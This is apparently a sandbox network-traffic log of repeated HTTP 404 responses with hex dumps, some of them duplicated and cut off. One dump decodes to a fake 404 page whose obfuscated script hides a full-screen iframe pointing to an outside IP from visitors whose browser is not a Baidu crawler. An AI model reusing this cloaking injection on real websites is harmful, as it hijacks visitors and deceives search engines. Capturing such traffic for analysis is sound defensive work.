      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:16:29 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:16:43 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 